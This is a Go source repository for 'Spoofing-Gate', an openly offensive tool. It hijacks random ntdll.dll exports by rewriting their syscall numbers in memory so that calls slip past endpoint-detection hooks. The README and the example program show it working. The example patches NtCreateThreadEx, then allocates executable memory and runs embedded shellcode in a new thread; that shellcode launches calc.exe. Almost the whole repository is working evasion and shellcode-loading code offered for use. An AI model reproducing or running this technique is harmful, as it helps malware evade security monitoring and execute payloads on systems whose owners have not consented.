├── LICENSE ├── README.md ├── example └── test-hook │ └── main.go ├── go.mod ├── go.sum └── pkg └── spfgate ├── const.go └── spfgate.go /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 TimWhite 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Spoofing-Gate 2 | (Hellsgate|Halosgate|Tartarosgate)+Spoofing-Gate. 
Ensures that all system calls go through ntdll.dll 3 | 4 | https://github.com/timwhitez/Doge-Gabh 5 | 6 | 7 | inspired by Recycled Gate 8 | 9 | https://github.com/thefLink/RecycledGate 10 | 11 | 12 | excludes the APIs listed in https://github.com/Mr-Un1k0d3r/EDRs 13 | 14 | 15 | - get sysid from "X"gate 16 | 17 | - use Spoofing-Gate to get the Spoofing function pointer 18 | 19 | - call the pointer 20 | 21 | - Recover (always call `Recover()` once the syscall has returned: until it runs, the borrowed ntdll export still carries the spoofed syscall number, so any other code in this process that calls that export executes the wrong syscall) 22 | 23 | ``` 24 | > .\SpfGate.exe 25 | messPtr:0x7ff91ee2e570 26 | Messed up the NTCreateThreadEx function, gl launching calc! 27 | NtAllocateVirtualMemory|(fake)NtQueryInformationTransactionManager: 0x7ff91ee2f710 28 | NtProtectVirtualMemory|(fake)NtEnumerateBootEntries: 0x7ff91ee2e910 29 | You seem to have bypassed a hooked function... congrats (sys ID is: 193) 30 | NtCreateThreadEx|(fake)NtCallbackReturn: 0x7ff91ee2ce00 31 | 32 | ``` 33 | 34 | ``` 35 | 36 | 方法使用详情: 37 | r1,e := spfgate.SpfGate(sysid,tmplist) 38 | 39 | sysid为目标api的sysid值 40 | tmplist是需要排除的api名字(部分api调用会报错或者冲突) 41 | r1为结构体 42 | 43 | type SPFG struct { 44 | Fakename string //随机api的名字 45 | Pointer uintptr //api地址 46 | Fakeid uint16 //替换后的sysid 47 | Realid uint16 //替换前的sysid 48 | } 49 | 50 | 结构体有个Recover()函数 51 | 用来恢复api的原sysid 52 | r1.Recover() 53 | 54 | 执行的时候就使用syscall执行r1.Pointer 55 | 56 | 57 | ``` 58 | 59 | 60 | 61 | ``` 62 | //get sysid from "X"gate 63 | alloc,e := gabh.MemHgate(str2sha1("NtAllocateVirtualMemory"),str2sha1) 64 | if e != nil { 65 | panic(e) 66 | } 67 | 68 | var tmplist []string 69 | tmplist = append(tmplist,[]string{"NtAllocateVirtualMemory"}...) 
70 | 71 | 72 | //use Spoofing-Gate to get the Spoofing funtion pointer 73 | alloctmp,e := spfgate.SpfGate(alloc,tmplist) 74 | if e != nil{ 75 | panic(e) 76 | } 77 | tmplist = append(tmplist,alloctmp.Fakename) 78 | fmt.Printf("NtAllocateVirtualMemory|(fake)") 79 | fmt.Printf(alloctmp.Fakename) 80 | fmt.Printf(": 0x%x\n",alloctmp.Pointer) 81 | 82 | //call the pointer 83 | r1, _,_ := syscall.Syscall6( 84 | alloctmp.Pointer, //ntallocatevirtualmemory 85 | 6, 86 | handle, 87 | uintptr(unsafe.Pointer(&baseA)), 88 | 0, 89 | uintptr(unsafe.Pointer(®ionsize)), 90 | uintptr(memCommit|memreserve), 91 | syscall.PAGE_READWRITE, 92 | ) 93 | if r1 != 0{ 94 | fmt.Printf("1 %x\n", r1) 95 | return 96 | } 97 | 98 | 99 | //Recover 100 | alloctmp.Recover() 101 | 102 | 103 | ``` 104 | 105 | 106 | -------------------------------------------------------------------------------- /example/test-hook/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "syscall" 6 | "unsafe" 7 | 8 | bananaphone "github.com/C-Sto/BananaPhone/pkg/BananaPhone" 9 | "github.com/timwhite/Spoofing-Gate/pkg/spfgate" 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | var shellcode = []byte{ 14 | //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode 15 | 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66, 16 | 0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61, 17 | 0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b, 18 | 0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48, 19 | 0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x3,0x57, 20 | 0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48, 21 | 0x1,0xfe,0x8b,0x54,0x1f,0x24,0xf,0xb7,0x2c,0x17, 22 | 0x8d,0x52,0x2,0xad,0x81,0x3c,0x7,0x57,0x69,0x6e, 23 | 0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x1,0xfe, 24 | 0x8b,0x34,0xae,0x48,0x1,0xf7,0x99,0xff,0xd7,0x48, 25 | 0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59, 26 | 0x58,0xc3, 27 | } 28 | 29 | 30 | func main() { 31 | kernel32DLL := 
windows.NewLazySystemDLL("kernel32.dll") 32 | VirtualProtectEx := kernel32DLL.NewProc("VirtualProtectEx") 33 | 34 | bp, e := bananaphone.NewBananaPhone(bananaphone.DiskBananaPhoneMode) 35 | if e != nil { 36 | panic(e) 37 | } 38 | 39 | mess:= syscall.NewLazyDLL("ntdll.dll").NewProc("NtCreateThreadEx").Addr() 40 | //fmt.Printf("%x\n", mess) 41 | if mess == 0{ 42 | panic(fmt.Errorf("NtCreateThreadEx 获取错误")) 43 | } 44 | 45 | oldProtect := windows.PAGE_EXECUTE_READ 46 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(0xffffffffffffffff), uintptr(mess), uintptr(0x100), windows.PAGE_EXECUTE_READWRITE, uintptr(unsafe.Pointer(&oldProtect))) 47 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 48 | //fmt.Printf("[!] Error on VirtualProtect:", errVirtualProtectEx, "\n") 49 | return 50 | } 51 | //overwrite in memory function bits to try and trigger bp to do smarts 52 | WriteMemory([]byte{0x90, 0x90, 0x4c, 0x8b, 0xd1, 0xb8, 0xc1, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90}, uintptr(mess)) 53 | 54 | var tmplist []string 55 | tmplist = append(tmplist,[]string{"NtAllocateVirtualMemory","NtProtectVirtualMemory","NtCreateThreadEx"}...) 
56 | 57 | //fmt.Println("Messed up the NTCreateThreadEx function, gl launching calc!") 58 | //resolve the functions and extract the syscalls 59 | alloc, e := bp.GetSysID("NtAllocateVirtualMemory") 60 | if e != nil { 61 | panic(e) 62 | } 63 | 64 | alloctmp,e := spfgate.SpfGate(alloc,tmplist) 65 | if e != nil{ 66 | panic(e) 67 | } 68 | tmplist = append(tmplist,alloctmp.Fakename) 69 | fmt.Printf("NtAllocateVirtualMemory|(fake)") 70 | fmt.Printf(alloctmp.Fakename) 71 | fmt.Printf(": 0x%x\n",alloctmp.Pointer) 72 | 73 | protect, e := bp.GetSysID("NtProtectVirtualMemory") 74 | if e != nil { 75 | panic(e) 76 | } 77 | 78 | protecttmp,e := spfgate.SpfGate(protect,tmplist) 79 | if e != nil{ 80 | panic(e) 81 | } 82 | tmplist = append(tmplist,protecttmp.Fakename) 83 | fmt.Printf("NtProtectVirtualMemory|(fake)") 84 | fmt.Printf(protecttmp.Fakename) 85 | fmt.Printf(": 0x%x\n",protecttmp.Pointer) 86 | 87 | 88 | createthread, e := bp.GetSysID("NtCreateThreadEx") 89 | if e != nil { 90 | panic(e) 91 | } 92 | 93 | createtmp,e := spfgate.SpfGate(createthread,tmplist) 94 | if e != nil{ 95 | panic(e) 96 | } 97 | fmt.Printf("You seem to have bypassed a hooked function... 
congrats (sys ID is: %d)\n", createtmp.Fakeid) 98 | 99 | tmplist = append(tmplist,createtmp.Fakename) 100 | fmt.Printf("NtCreateThreadEx|(fake)") 101 | fmt.Printf(createtmp.Fakename) 102 | fmt.Printf(": 0x%x\n",createtmp.Pointer) 103 | 104 | 105 | createThread(shellcode, uintptr(0xffffffffffffffff), alloctmp, protecttmp, createtmp) 106 | } 107 | 108 | 109 | func WriteMemory(inbuf []byte, destination uintptr) { 110 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 111 | writePtr := unsafe.Pointer(destination + uintptr(index)) 112 | v := (*byte)(writePtr) 113 | *v = inbuf[index] 114 | } 115 | } 116 | 117 | 118 | 119 | func createThread(shellcode []byte, handle uintptr, NtAllocateVirtualMemorySysid, NtProtectVirtualMemorySysid, NtCreateThreadExSysid *spfgate.SPFG) { 120 | 121 | const ( 122 | thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle. 123 | memCommit = uintptr(0x00001000) 124 | memreserve = uintptr(0x00002000) 125 | ) 126 | 127 | var baseA uintptr 128 | regionsize := uintptr(len(shellcode)) 129 | r1, _,_ := syscall.Syscall6( 130 | NtAllocateVirtualMemorySysid.Pointer, //ntallocatevirtualmemory 131 | 6, 132 | handle, 133 | uintptr(unsafe.Pointer(&baseA)), 134 | 0, 135 | uintptr(unsafe.Pointer(®ionsize)), 136 | uintptr(memCommit|memreserve), 137 | syscall.PAGE_READWRITE, 138 | ) 139 | if r1 != 0{ 140 | fmt.Printf("1 %x\n", r1) 141 | return 142 | } 143 | NtAllocateVirtualMemorySysid.Recover() 144 | 145 | //write memory 146 | WriteMemory(shellcode, baseA) 147 | 148 | var oldprotect uintptr 149 | r1, _,_ = syscall.Syscall6( 150 | NtProtectVirtualMemorySysid.Pointer, //NtProtectVirtualMemory 151 | 5, 152 | handle, 153 | uintptr(unsafe.Pointer(&baseA)), 154 | uintptr(unsafe.Pointer(®ionsize)), 155 | syscall.PAGE_EXECUTE_READ, 156 | uintptr(unsafe.Pointer(&oldprotect)), 157 | 0, 158 | ) 159 | if r1 != 0 { 160 | fmt.Printf("2 %x\n", r1) 161 | return 162 | } 163 | 
NtProtectVirtualMemorySysid.Recover() 164 | 165 | var hhosthread uintptr 166 | r1,_,_ = syscall.Syscall12( 167 | NtCreateThreadExSysid.Pointer, 168 | 11,//NtCreateThreadEx 169 | uintptr(unsafe.Pointer(&hhosthread)), //hthread 170 | 0x1FFFFF, //desiredaccess 171 | 0, //objattributes 172 | handle, //processhandle 173 | baseA, //lpstartaddress 174 | 0, //lpparam 175 | uintptr(0), //createsuspended 176 | 0, //zerobits 177 | 0, //sizeofstackcommit 178 | 0, //sizeofstackreserve 179 | 0, //lpbytesbuffer 180 | 0, 181 | ) 182 | if r1 != 0 { 183 | fmt.Printf("3 %x\n", r1) 184 | return 185 | } 186 | NtCreateThreadExSysid.Recover() 187 | syscall.WaitForSingleObject(syscall.Handle(hhosthread), 0xffffffff) 188 | 189 | } 190 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/timwhite/Spoofing-Gate 2 | 3 | go 1.17 4 | 5 | require golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7 6 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7 h1:BXxu8t6QN0G1uff4bzZzSkpsax8+ALqTGUtz08QrV00= 2 | golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 3 | -------------------------------------------------------------------------------- /pkg/spfgate/const.go: -------------------------------------------------------------------------------- 1 | package spfgate 2 | 3 | 4 | var apiconst = []string{ 5 | 
"NtCommitRegistryTransaction","NtReplyWaitReceivePort","NtGetCachedSigningLevel","NtSetIntervalProfile","NtOpenSemaphore","NtExtendSection","NtFlushInstallUILanguage","NtQueryInformationWorkerFactory","NtYieldExecution","NtSecureConnectPort","NtQueryEvent","NtDebugActiveProcess","NtSinglePhaseReject","NtWriteFileGather","NtQueryInformationTransaction","NtAssignProcessToJobObject","NtQueryDebugFilterState","NtTestAlert","NtRenameTransactionManager","NtResetWriteWatch","NtSetQuotaInformationFile","NtCreateKeyedEvent","NtFlushBuffersFileEx","NtQueryInformationJobObject","NtFlushWriteBuffer","NtAllocateUserPhysicalPages","NtCreateDirectoryObjectEx","NtAcquireProcessActivityReference","NtReplyPort","NtCreateCrossVmMutant","NtQueryIntervalProfile","NtSaveKey","NtImpersonateAnonymousToken","NtOpenJobObject","NtSetSystemEnvironmentValue","NtAddAtom","NtQueryBootEntryOrder","NtReadFileScatter","NtReleaseMutant","NtCreateDebugObject","NtSetEaFile","NtThawRegistry","NtMakeTemporaryObject","NtAllocateUuids","NtCreateProfile","NtSetSystemTime","NtSaveMergedKeys","NtSetBootOptions","NtCreateWnfStateName","NtAddAtomEx","NtCreateKeyTransacted","NtInitializeRegistry","NtCreateLowBoxToken","NtQueryDirectoryObject","NtOpenKeyTransacted","NtQueryInformationTransactionManager","NtEnumerateTransactionObject","NtContinueEx","NtQuerySection","NtDeleteDriverEntry","NtWorkerFactoryWorkerReady","NtSetDefaultUILanguage","NtCreateEnclave","NtQueryObject","NtAllocateUserPhysicalPagesEx","NtQueryOpenSubKeys","NtPlugPlayControl","NtSetDefaultHardErrorPort","NtSetUuidSeed","NtAllocateLocallyUniqueId","NtCompareSigningLevels","NtSetVolumeInformationFile","NtOpenDirectoryObject","NtOpenTransactionManager","NtCallbackReturn","NtFilterTokenEx","NtCancelIoFileEx","NtDisplayString","NtRevertContainerImpersonation","NtCreateSymbolicLinkObject","NtQuerySystemEnvironmentValueEx","NtPropagationComplete","NtRollbackEnlistment","NtOpenPrivateNamespace","NtPropagationFailed","NtGetWriteWatch","NtOpenSection","N
tEnumerateValueKey","NtReplyWaitReceivePortEx","NtImpersonateClientOfPort","NtCreateNamedPipeFile","NtDeleteAtom","NtRemoveProcessDebug","NtTranslateFilePath","NtQueryInformationAtom","NtIsProcessInJob","NtReleaseSemaphore","NtFlushKey","NtQuerySecurityPolicy","NtSaveKeyEx","NtDeleteWnfStateName","NtTerminateEnclave","NtQueryEaFile","NtCreateCrossVmEvent","NtQueryInformationToken","NtOpenResourceManager","NtApphelpCacheControl","NtUnlockFile","NtCreateToken","NtGetMUIRegistryInfo","NtQueryInformationEnlistment","NtCreateMailslotFile","NtUnlockVirtualMemory","NtPulseEvent","NtQueryDefaultUILanguage","NtVdmControl","NtCreateRegistryTransaction","NtCallEnclave","NtCompareObjects","NtAccessCheckByTypeAndAuditAlarm","NtRequestPort","NtQuerySymbolicLinkObject","NtClearEvent","NtCompleteConnectPort","NtQueryInformationByName","NtFilterToken","NtRaiseException","NtShutdownWorkerFactory","NtCreateWaitablePort","NtInitializeNlsFiles","NtSetLdtEntries","NtAcceptConnectPort","NtCompareTokens","NtQueryDirectoryFileEx","NtPssCaptureVaSpaceBulk","NtUpdateWnfStateData","NtCreateEventPair","NtCommitTransaction","NtDisableLastKnownGood","NtCreateJobObject","NtAccessCheckByType","NtFreezeTransactions","NtCommitComplete","NtSignalAndWaitForSingleObject","NtOpenObjectAuditAlarm","NtOpenTransaction","NtOpenEnlistment","NtSetSecurityObject","NtGetDevicePowerState","NtCreateTokenEx","NtQueryKey","NtGetCompleteWnfStateSubscription","NtFlushVirtualMemory","NtEnumerateBootEntries","NtQueryDefaultLocale","NtRegisterProtocolAddressInformation","NtGetNlsSectionPtr","NtShutdownSystem","NtPrivilegeCheck","NtAdjustGroupsToken","NtQueryLicenseValue","NtCreateEvent","NtLockVirtualMemory","NtSetCachedSigningLevel2","NtCancelSynchronousIoFile","NtRecoverTransactionManager","NtOpenEventPair","NtRecoverResourceManager","NtCreatePrivateNamespace","NtReplaceKey","NtQueryValueKey","NtInitiatePowerAction","NtFilterBootOption","NtSetCachedSigningLevel","NtEnumerateDriverEntries","NtRaiseHardError","NtNotifyCh
angeMultipleKeys","NtQueryMultipleValueKey","NtReadFile","NtQueryInstallUILanguage","NtCompactKeys","NtAccessCheckByTypeResultListAndAuditAlarm","NtUnloadKey2","NtSetDebugFilterState","NtWriteRequestData","NtMakePermanentObject","NtSetLowWaitHighEventPair","NtDebugContinue","NtReadRequestData","NtListenPort","NtCreateDirectoryObject","NtDeleteWnfStateData","NtGetNotificationResourceManager","NtOpenEvent","NtPrivilegedServiceAuditAlarm","NtOpenPartition","NtRecoverEnlistment","NtAdjustTokenClaimsAndDeviceGroups","NtDeleteObjectAuditAlarm","NtSetBootEntryOrder","NtFlushInstructionCache","NtQueryAuxiliaryCounterFrequency","NtRollforwardTransactionManager","NtOpenKeyTransactedEx","NtFreezeRegistry","NtInitializeEnclave","NtUnloadKey","NtSetSystemPowerState","NtReadOnlyEnlistment","NtFlushProcessWriteBuffers","NtPrePrepareEnlistment","NtCreateResourceManager","NtCreatePort","NtQueryInformationFile","NtReplyWaitReplyPort","NtLockProductActivationKeys","NtConnectPort","NtManagePartition","NtDirectGraphicsCall","NtQueryInformationPort","NtQueryWnfStateData","NtCompressKey","NtAccessCheckAndAuditAlarm","NtGetNextProcess","NtReplacePartitionUnit","NtCreateProfileEx","NtSetSystemInformation","NtSubscribeWnfStateChange","NtOpenSymbolicLinkObject","NtAllocateReserveObject","NtResetEvent","NtCancelIoFile","NtDrawText","NtManageHotPatch","NtLockRegistryKey","NtPowerInformation","NtSetDefaultLocale","NtQueryWnfStateNameInformation","NtCreatePartition","NtAccessCheckByTypeResultListAndAuditAlarmByHandle","NtPrivilegeObjectAuditAlarm","NtSetLowEventPair","NtOpenRegistryTransaction","NtQueryVolumeInformationFile","NtEnableLastKnownGood","NtReleaseWorkerFactoryWorker","NtQueryBootOptions", 6 | } 7 | 8 | -------------------------------------------------------------------------------- /pkg/spfgate/spfgate.go: -------------------------------------------------------------------------------- 1 | package spfgate 2 | 3 | import ( 4 | "crypto/sha1" 5 | "fmt" 6 | "math/rand" 7 | "sort" 8 | 
"time" 9 | "unsafe" 10 | 11 | "github.com/timwhitez/Doge-Gabh/pkg/Gabh" 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | type SPFG struct { 16 | Fakename string 17 | Pointer uintptr 18 | Fakeid uint16 19 | Realid uint16 20 | } 21 | 22 | 23 | func (f *SPFG)Recover(){ 24 | var sysid uint16 25 | sysid = f.Realid 26 | windows.WriteProcessMemory(0xffffffffffffffff,f.Pointer+4,(*byte)(unsafe.Pointer(&sysid)),2,nil) 27 | } 28 | 29 | 30 | func strin(target string, str_array []string) bool { 31 | sort.Strings(str_array) 32 | index := sort.SearchStrings(str_array, target) 33 | if index < len(str_array) && str_array[index] == target { 34 | return true 35 | } 36 | return false 37 | } 38 | 39 | func str2sha1(s string) string { 40 | h := sha1.New() 41 | h.Write([]byte(s)) 42 | bs := h.Sum(nil) 43 | return fmt.Sprintf("%x", bs) 44 | } 45 | 46 | 47 | func SpfGate(sysid uint16,none []string) (*SPFG,error){ 48 | newfcg := new(SPFG) 49 | apilen := len(apiconst) 50 | newfcg.Fakeid = sysid 51 | 52 | s := rand.NewSource(time.Now().UnixNano()) 53 | r := rand.New(s) // initialize local pseudorandom generator 54 | i := 0 55 | 56 | for{ 57 | i++ 58 | idx := r.Intn(len(apiconst)) 59 | for strin(apiconst[idx],none){ 60 | idx = r.Intn(len(apiconst)) 61 | } 62 | 63 | api64,_,_ := gabh.MemFuncPtr(string([]byte{'n','t','d','l','l','.','d','l','l'}),str2sha1(apiconst[idx]),str2sha1) 64 | if api64 == 0{ 65 | if i >= apilen{ 66 | break 67 | } 68 | continue 69 | } 70 | tmpApi := uintptr(api64) 71 | 72 | if tmpApi == 0{ 73 | continue 74 | } 75 | if *(*byte)(unsafe.Pointer(tmpApi)) == 0x4c && 76 | *(*byte)(unsafe.Pointer(tmpApi+1)) == 0x8b && 77 | *(*byte)(unsafe.Pointer(tmpApi+2)) == 0xd1 && 78 | *(*byte)(unsafe.Pointer(tmpApi+3)) == 0xb8 && 79 | *(*byte)(unsafe.Pointer(tmpApi+6)) == 0x00 && 80 | *(*byte)(unsafe.Pointer(tmpApi+7)) == 0x00 { 81 | newfcg.Realid = uint16(*(*byte)(unsafe.Pointer(tmpApi+4))) | uint16(*(*byte)(unsafe.Pointer(tmpApi+5)))<<8 82 | 
windows.WriteProcessMemory(0xffffffffffffffff,tmpApi+4,(*byte)(unsafe.Pointer(&sysid)),2,nil) 83 | newfcg.Pointer = tmpApi 84 | newfcg.Fakename = apiconst[idx] 85 | return newfcg,nil 86 | } 87 | if i >= apilen{ 88 | break 89 | } 90 | } 91 | return newfcg,fmt.Errorf("tmpApi found Err") 92 | } 93 | --------------------------------------------------------------------------------